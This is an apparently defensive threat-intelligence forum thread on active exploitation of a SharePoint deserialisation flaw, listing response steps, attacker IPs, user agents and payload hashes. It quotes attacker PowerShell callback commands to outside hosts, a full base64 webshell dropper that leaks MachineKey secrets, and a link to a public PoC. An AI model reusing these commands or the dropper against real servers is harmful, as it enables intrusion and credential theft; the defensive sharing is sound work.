Microsoft SharePoint CVE-2026-50522

Last Updated: 2026-07-25T12:48:20Z

What’s Happening

Microsoft SharePoint Remote Code Execution Vulnerability CVE-2026-50522 is actively exploited in the wild since 2026-07-17T00:00:00Z. This is an unauthenticated deserialisation vulnerability. A public proof-of-concept has been available since 2026-07-20T05:53:56Z. A patch is available since 2026-07-14T00:00:00Z (Patch Tuesday).

Actions

  1. Collect forensic evidence including but not limited to Windows Event logs, AV/EDR logging, IIS Webserver logging, firewall logging. Make a memory snapshot and consider disk snapshots. Collect logging going back to at least 2026-07-17T00:00:00Z.

  2. Update Microsoft SharePoint servers to a patched version (July 2026 or later) or limit external access until a patch is applied. Reboot SharePoint servers after updating.

  3. Rotate all MachineKey/ValidationKey credentials on SharePoint servers and consider enabling automatic MachineKey rotation.

  4. Check collected forensic evidence for suspicious activity.

    1. Look for HTTP requests with method POST, URI path’s /_trust/default.aspx, /_windows/default.aspx and status code 500 as indicator of (attempted) exploitation. This can include False Positives.
    2. Look for process creation events for suspicious processes like powershell.exe spawning from the SharePoint worker process w3wp.exe. Note that deserialisation attacks do not require a process creation to be successful.
    3. Look for outbound network connections from (child processes of) SharePoint worker process w3wp.exe.
    4. Look for newly created executable files in SharePoint webroot directories, including directories such as \TEMPLATE\LAYOUTS\.
  5. Continue with incident response with suspicious activity is identified, or start with recovery.

Indicators of Compromise (IOC’s)

All valid from 2026-07-17T00:00:00Z until 2026-07-31T00:00:00Z (estimate).

Indicator Indicator type Comments
/_trust/default.aspx URI Path Exploited URI path via POST request with malicious cookie value
/_windows/default.aspx URI Path Exploited URI path via POST request with malicious cookie value
/_layouts/layout2sp.aspx URI Path Webshell URI that returns MachineKey. Associated with 199.91.221.54
/_layouts/15/cm*.aspx URI path Webshell “Helper Tool” URI. Associated with 165.154.199.52
103.114.161.6 ipv4-addr Exploit source. AS142036 Hosteons Pte. Ltd.
146.19.216.119 ipv4-addr Exploit source. AS134677 Dromatics Systems Pte Ltd.
77.110.123.40 ipv4-addr Exploit source and callback IP. AS203273 NetCrafters OU
149.102.254.84 ipv4-addr Exploit source. AS212238 Datacamp Limited. VPN?
199.91.221.54 ipv4-addr Exploit source. AS399629 BL Networks. User-Agents vary.
45.63.58.216 ipv4-addr Exploit source and callback IP. AS20473 Vultr
149.40.49.54 ipv4-addr Exploit source. AS212238 Datacamp Limited. Clever HEAD only truc, to avoid spilling to payload to low-interaction honeypots.
107.191.46.42 ipv4-addr Exploit source. AS20473 Vultr
103.138.13.175 ipv4-addr Exploit source. AS138195 MOACK.Co.LTD
162.211.231.102 ipv4-addr Exploit source. AS25820 IT7 Networks Inc
104.248.220.253 ipv4-addr Exploit source. AS14061 DigitalOcean
206.189.199.39 ipv4-addr Exploit source. AS14061 DigitalOcean
138.68.51.132 ipv4-addr Exploit source. AS14061 DigitalOcean
134.122.43.198 ipv4-addr Exploit source. AS14061 DigitalOcean
194.195.125.182 ipv4-addr Exploit source. AS63949 Linode
134.209.92.223 ipv4-addr Exploit source. AS14061 DigitalOcean
172.237.53.104 ipv4-addr Exploit source. AS63949 Linode
168.144.176.24 ipv4-addr Exploit source. AS14061 DigitalOcean
137.184.184.209 ipv4-addr Exploit source. AS14061 DigitalOcean
151.243.137.78 ipv4-addr Exploit source. AS212238 Datacamp Limited
185.122.186.177 ipv4-addr Attack source. AS174 EDIS
89.117.94.35 ipv4-addr Exploit source. AS46475 Limestone Networks
155.138.207.22 ipv4-addr Exploit source. AS20473 Vultr
165.154.199.52 ipv4-addr Exploit source. AS142002 Scloud Pte Ltd
195.160.223.50 ipv4-addr Expoit source. AS43641 SOLLUTIUM EU Sp z.o.o.
178.131.136.213 ipv4-addr Expoit source. AS50810 Mobin Net Communication Company (mci.ir)
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.7417 HTTP Request header User-Agent Associated with 149.102.254.84
python-requests/2.34.2 HTTP Request header User-Agent Associated with 45.63.58.216, 178.131.136.213
python-requests/2.32.5 HTTP Request header User-Agent Associated with 155.138.207.22
curl/8.19.0 HTTP Request header User-Agent Associated with 149.102.254.84
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 HTTP Request header User-Agent Associated with 45.63.58.216, 178.131.136.213, 195.160.223.50
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158 HTTP Request header User-Agent Associated with 45.63.58.216 and 146.19.216.119
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 HTTP Request Header user-agent Associated with 162.211.231.102
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.4294 HTTP Request Header user-agent Associated with 149.40.49.54
python-requests/2.31.0 HTTP Request Header user-agent Associated with 107.191.46.42, 89.117.94.35, 77.110.123.40
Python-urllib/3.13 HTTP Request Header user-agent Associated with 103.138.13.175
Mozilla/5.0 HTTP Request Header user-agent Associated with 104.248.220.253, 206.189.199.39, 138.68.51.132, 134.122.43.198, 194.195.125.182, 134.209.92.223, 151.243.137.78
Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-TW) WindowsPowerShell/5.1.26100.7462 HTTP Request header User-Agent Associated with 185.122.186.177
46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d7 file SHA-256 tyt0qmyy.dll .NET deserialisation payload. Returns the HTTP response header sec-ch-ua-mobile: ?1 on succesfull exploitation.
7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec95 file SHA-256 Main.dll .NET deserialisation payload. Returns the MachineKey and related configuration options in the response body. Associated with 146.19.216.119. Snippet code: current.Response.Write(machineKeySection.ValidationKey [SNIP]
91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb70549 file SHA-256 edm3ysnc.dll .NET payload to return MachineKeys. Quite elaborate MyPayloadClass which supports logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band using response headers X-CM, X-VA, X-DA, X-AG, X-VK, X-DK. Associated with 103.138.13.175 and 162.211.231.102.
afce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb35 file SHA-256 bwd0vdqa.dll .NET payload to return MachineKeys. Quite elaborate with support logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band in response body in the following format: <pre>Hostname:" + Environment.MachineName + "\n [SNIP]. Associated with 134.122.43.198, 172.237.53.104 and likely the entire DigitalOcean/Linode cluster.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/a5b622958d834e46bb7166ac8588098f' text Powershell command associated with 45.63.58.216.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/check' text Powershell command associated with 77.110.123.40.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/spse-cookie-rce-37a3b0e647a34e189221755146afb4d7' text Powershell command associated with 149.102.254.84
powershell -nop -c "[IO.File]::WriteAllBytes('C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\TEMPLATE\\LAYOUTS\\layout2sp.aspx',[Convert]::FromBase64String('PCVAI[SNIP]wdD4='))" text Powershell command to write a webshell to layout2sp.aspx. Associated with 199.91.221.54.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://x20byil6hgjjlg59mbf3v6bis9y0mqaf.oastify.com/spse-cookie-rce-80b348691f224a01bf560c08be177241 text Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with 185.122.186.177
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://t60595apww0ch4o1j4hmmhs5qwwnkg85.oastify.com text Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with `178.131.136.213
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://wrr8u8vshzlf2794472p7kd8bzhq5lta.oastify.com text Powershell payload with Out-of-band Application Security (OAST) callback domain oastify.com (Portswigger Burpsuite). Associated with 195.160.223.50
352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be9459151 file SHA-256 jflyahz3.dll .NET payload to retreive MachineKey credentials. Returns headers X-NetVersion, X-ValidationKey, X-ValidationAlg, X-DecryptionKey, X-DecryptionAlg, X-CompatibilityMode, X-MasterValidationKey, X-MasterDecryptionKey, X-AppName, X-AppId, X-AutoValidationKey, X-AutoDecryptionKey, X-AppIdSpecificValidationKey, X-AppIdSpecificDecryptionKey, X-Err. Associated with 89.117.94.35
8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d file SHA-256 14e2gtsh.dll .NET payload to retrieve MachineKeys. Code snippet: `current.Response.Write("STARThN: " + hostName + "
02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd file SHA-256 eze1fcmh.dll .NET payload for webshell/backdoor 450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511. Associated with 165.154.199.52
824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b9966 file SHA-256 b4tg4ktk.dll .NET payload to retrieve MachineKeys in-band. Returns status code 200.
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\layout2sp.aspx file location Webshell that returns MachineKey credentials. Associated with 199.91.221.54.
d7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597 file SHA-256 Webshell layout2sp.aspx associated with 199.91.221.54
450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511 file SHA-256 Webshell “Helper Tool” and filename cmRANDOM.aspx. Executed payloads are executed in-memory using Assembly.Load(assemblyBytes). The filename is randomised. Associated with 165.154.199.52.

Notes

3 Likes

CTI from the raw TLP:CLEAR sources. Everything related to a time between 2026-07-19 and 2026-07-22.

Indicator Indicator type Comments
45.63.58.216 ipv4-addr Exploit source IPv4. AS20473 Vultr
103.114.161.6 ipv4-addr Exploit source IPv4. AS142036 Hosteons Pte. Ltd.
146.19.216.119 ipv4-addr Exploit source IPv4. AS134677 Dromatics Systems Pte Ltd.
77.110.123.40 ipv4-addr Exploit source IPv4 and callback IPv4. AS203273 NetCrafters OU
149.102.254.84 ipv4-addr Exploit source IPv4. AS212238 Datacamp Limited. VPN?
199.91.221.54 ipv4-addr Exploit source IPv4. AS399629 BL Networks. User-Agents vary.
45.63.58.216 ipv4-addr Callback IPv4 and associated with 45.63.58.216. AS20473 The Constant Company, LLC
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.7417 HTTP Request header User-Agent Associated with 149.102.254.84
python-requests/2.34.2 HTTP Request header User-Agent Associated with 45.63.58.216
curl/8.19.0 HTTP Request header User-Agent Associated with 149.102.254.84
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 HTTP Request header User-Agent Associated with 45.63.58.216.
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158 HTTP Request header User-Agent Associated with 45.63.58.216 and 146.19.216.119
python-requests/2.31.0 HTTP Request header User-Agent Associated with 77.110.123.40
46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d7 file SHA-256 .NET deserialisation payload. Returns the HTTP response header sec-ch-ua-mobile: ?1 on succesfull exploitation.
7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec95 file SHA-256 .NET deserialisation payload. Returns the MachineKey and related configuration options in the response body. Associated with 146.19.216.119. Snippet code: current.Response.Write(machineKeySection.ValidationKey + "
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/a5b622958d834e46bb7166ac8588098f' text Powershell command associated with 45.63.58.216.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/check' text Powershell command associated with 77.110.123.40.
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://77.110.123.40/spse-cookie-rce-37a3b0e647a34e189221755146afb4d7' text Powershell command associated with 149.102.254.84
powershell -nop -c "[IO.File]::WriteAllBytes('C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\TEMPLATE\\LAYOUTS\\layout2sp.aspx',[Convert]::FromBase64String('PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT48JUAgSW1wb3J0IE5hbWVzcGFjZT0iU3lzdGVtLklPIiAlPjxzY3JpcHQgcnVuYXQ9InNlcnZlciIgbGFuZ3VhZ2U9ImMjIiBDT0RFUEFHRT0iNjUwMDEiPnB1YmxpYyB2b2lkIFBhZ2VfbG9hZCgpe3ZhciBzeT1TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseS5Mb2FkKCJTeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYSIpO3ZhciBta3Q9c3kuR2V0VHlwZSgiU3lzdGVtLldlYi5Db25maWd1cmF0aW9uLk1hY2hpbmVLZXlTZWN0aW9uIik7dmFyIGdhYz1ta3QuR2V0TWV0aG9kKCJHZXRBcHBsaWNhdGlvbkNvbmZpZyIsU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLlN0YXRpY3xTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuTm9uUHVibGljKTt2YXIgY2c9KFN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbilnYWMuSW52b2tlKG51bGwsbmV3IG9iamVjdFswXSk7UmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpO308L3NjcmlwdD4='))" text Powershell command associated with 199.91.221.54. Decodes further to the snippet `Response.Write(cg.ValidationKey+"

Looks like attacks are mixed between the public PoC (powershell.exe spawn with callback) and actors knowing how to put in their own payloads (or just knowing how to reuse last years payloads). There is also a mix of actors trying to hide activity by using Browser lookalike agents.

Also interesting to note that the IP 77.110.123.40 is used as a callback for attacking coming from both 149.102.254.84 and 77.110.123.40 itself.

@mttaggart Interesting to ingest into MISP?

Show me a primary source for them and we can ingest. I won’t pull based on X, BC, or LinkedIn. And if the sources are existing feeds, we don’t need to replicate. I’ve been trying to put events in the feed that are hard to source from elsewhere, or that we discover ourselves.

Everything was sourced from enumerating the SANS Weblog requests: Web Server Log Project - SANS Internet Storm Center

1 Like

Thank you! Looks like low prevalence elsewhere for these; I’ll get them in MISP.

1 Like

I added a new challenger to the IOC table: 199.91.221.54, which I will put in the first post.

PoC here: https://gist.githubusercontent.com/testanull/0868e02d81d57d6c59a91261969f7f81/raw/4d16304047e525057d732401f718e20fa830eb0a/SharePoint%2520SE%2520p2o%2520PoC.ps1

I am calling it: this is now mass exploitation with multiple clusters, payloads, webshells, and in-memory payloads. I will update the first post with bunch munch more indicators. All files are uploaded to VirusTotal with hashes mentioned here. As before everything TLP:CLEAR from the logs. We should work on detection rules next: Suricata, Sigma, etc. Unlike last year it appears that Microsoft did not bother to implement this themselves for the AMSI scanning integration. If anyone knows anyone that can contribute that would be nice.

Indicator Indicator type Comments
149.40.49.54 ipv4-addr Exploit source. AS212238 Datacamp Limited. Clever HEAD only truc, to avoid spilling to payload to low-interaction honeypots.
107.191.46.42 ipv4-addr Exploit source. AS20473 Vultr
103.138.13.175 ipv4-addr Exploit source. AS138195 MOACK.Co.LTD
162.211.231.102 ipv4-addr Exploit source. AS25820 IT7 Networks Inc
104.248.220.253 ipv4-addr Exploit source. AS14061 DigitalOcean
206.189.199.39 ipv4-addr Exploit source. AS14061 DigitalOcean
138.68.51.132 ipv4-addr Exploit source. AS14061 DigitalOcean
134.122.43.198 ipv4-addr Exploit source. AS14061 DigitalOcean
194.195.125.182 ipv4-addr Exploit source. AS63949 Linode
134.209.92.223 ipv4-addr Exploit source. AS14061 DigitalOcean
172.237.53.104 ipv4-addr Exploit source. AS63949 Linode
168.144.176.24 ipv4-addr Exploit source. AS14061 DigitalOcean
137.184.184.209 ipv4-addr Exploit source. AS14061 DigitalOcean
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 HTTP Request Header user-agent Associated with 162.211.231.102
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.4294 HTTP Request Header user-agent Associated with 149.40.49.54
python-requests/2.31.0 HTTP Request Header user-agent Associated with 107.191.46.42
Python-urllib/3.13 HTTP Request Header user-agent Associated with 103.138.13.175
Mozilla/5.0 HTTP Request Header user-agent Associated with 104.248.220.253, 206.189.199.39, 138.68.51.132, 134.122.43.198, 194.195.125.182, 134.209.92.223
91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb70549 file sha-256 edm3ysnc.dll .NET payload to return MachineKeys. Quite elaborate MyPayloadClass which supports logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band using response headers X-CM, X-VA, X-DA, X-AG, X-VK, X-DK. Associated with 103.138.13.175 and 162.211.231.102.
afce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb35 file sha-256 bwd0vdqa.dll .NET payload to return MachineKeys. Quite elaborate with support logic to differentiate based on ValidationKey and CompatabilityMode settings. Returns values in-band in response body in the following format: <pre>Hostname:" + Environment.MachineName + "\n [SNIP]``. Associated with 134.122.43.198, 172.237.53.104` and likely the entire DigitalOcean/Linode cluster.

Original post and MISP event updated with the exploited URI path.

2 Likes

I keep finding new attacker IP’s and payloads: 352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be9459151 , 89.117.94.35. Updated the first post

Last minutes changes are more cosmetic like adding the payload .dll names. I also changed the webshell dropper from ‘file hash’ back to the powershell command. It really isn’t a ‘.net payload’ anyway

1 Like

And one more, we are definitely in mass exploitation: 185.122.186.177, Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-TW) WindowsPowerShell/5.1.26100.7462 with Powershell payload: powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://x20byil6hgjjlg59mbf3v6bis9y0mqaf.oastify.com/spse-cookie-rce-80b348691f224a01bf560c08be177241 . The Powershell payload uses out-of-band callback using the oastify.com domain (Portswigger Burpsuite). Interesting to see the zh-TW language tag here. Looks like an opsec failure. There was recently also an interesting GO Simple Tunnel (GOST.run) proxy tool observation on 185.122.186.177:14789.

Updated the first post

  • Added /_windows/default.aspx path
  • Restructured actions section, addedd that rebooting is a required step
  • Added more indicators

We have now reach the stage where threat actors know how to hide their backdoors by randomizing file names and hosting webshells completely in-memory using a VirtualPathProvider (VPP) webshell. Memory artifacts will be crucial for this one. 02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd, 450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511, /_layouts/15/cm*.aspx.

1 Like

Can you explain those indicators?

Still scraping the logs: Web Server Log Project - Logs for 2026-07-24 and Report ID 819736316

Decode using CyberChef → URL Decode, extract cookie value, base64 decode + raw inflate, extract Base64 → base64 deode + Gzip unzip → analyse payload.dll using ILSpy

If I’m reading this correctly, the DLL contains an in-memory shell that enables upload of follow-on webshells. It would be cool to see what shells are favored in these campaigns.

Yes. It looks like a compiled version of GhostWebShell.cs, but with a different webshell payload and logic to generate unique file locations.

Will update the first post later.

  • Are there any Forti Fans here? This threat actor sure is one.
    Source: 45.61.137.173 (AS399629 BL Networks)
    Payload: 2gevnrgn.dll (Incomplete file: b82629805bc4aa72d7dd3c908ddbf954bdea21e0d4a6d1f4036d525ef78f8aee )
    Appears to get a file from https://s3.wasabisys.com/fortifs/vamd64.msi (b82629805bc4aa72d7dd3c908ddbf954bdea21e0d4a6d1f4036d525ef78f8aee ) which appears to be Valociraptor with C2 URL https://api.forti.fans/ . In additional there are a bunch of other compiled files with strings like badpotato.dll, PingCastle.

    Anyone wants to make a guess on the relation to Velociraptor leveraged in ransomware attacks / Storm-2603?

  • Source: 114.34.123.111 (AS3462 Data Communication Business Group)
    User-Agent: Mozilla/5.0

    ab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da012 z1zkfu55.dll

    74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f hyyavam5.dll